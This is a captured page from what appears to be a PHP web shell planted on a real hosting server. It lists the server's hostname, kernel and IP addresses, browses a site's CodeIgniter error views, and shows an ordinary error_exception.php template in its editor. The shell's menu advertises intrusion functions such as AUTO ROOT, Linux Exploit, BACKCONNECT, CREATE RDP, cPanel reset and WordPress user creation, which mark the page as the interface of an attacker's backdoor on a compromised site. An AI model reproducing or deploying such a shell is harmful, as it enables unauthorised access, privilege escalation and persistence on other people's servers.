Linux host40.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 68.65.120.213 | : 216.73.217.2
Cant Read [ /etc/named.conf ]
7.4.33
trade
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
trade /
public_html /
app /
Views /
errors /
cli /
[ HOME SHELL ]
Name
Size
Permission
Action
error_404.php
102
B
-rw-r--r--
error_exception.php
1.98
KB
-rw-r--r--
production.php
139
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : error_exception.php
<?php use CodeIgniter\CLI\CLI; // The main Exception CLI::newLine(); CLI::write('[' . get_class($exception) . ']', 'light_gray', 'red'); CLI::newLine(); CLI::write($message); CLI::newLine(); CLI::write('at ' . CLI::color(clean_path($exception->getFile()) . ':' . $exception->getLine(), 'green')); CLI::newLine(); // The backtrace if (defined('SHOW_DEBUG_BACKTRACE') && SHOW_DEBUG_BACKTRACE) { $backtraces = $exception->getTrace(); if ($backtraces) { CLI::write('Backtrace:', 'green'); } foreach ($backtraces as $i => $error) { $padFile = ' '; // 4 spaces $padClass = ' '; // 7 spaces $c = str_pad($i + 1, 3, ' ', STR_PAD_LEFT); if (isset($error['file'])) { $filepath = clean_path($error['file']) . ':' . $error['line']; CLI::write($c . $padFile . CLI::color($filepath, 'yellow')); } else { CLI::write($c . $padFile . CLI::color('[internal function]', 'yellow')); } $function = ''; if (isset($error['class'])) { $type = ($error['type'] === '->') ? '()' . $error['type'] : $error['type']; $function .= $padClass . $error['class'] . $type . $error['function']; } elseif (! isset($error['class']) && isset($error['function'])) { $function .= $padClass . $error['function']; } $args = implode(', ', array_map(static function ($value) { switch (true) { case is_object($value): return 'Object(' . get_class($value) . ')'; case is_array($value): return count($value) ? '[...]' : '[]'; case $value === null: return 'null'; // return the lowercased version default: return var_export($value, true); } }, array_values($error['args'] ?? []))); $function .= '(' . $args . ')'; CLI::write($function); CLI::newLine(); } }
Close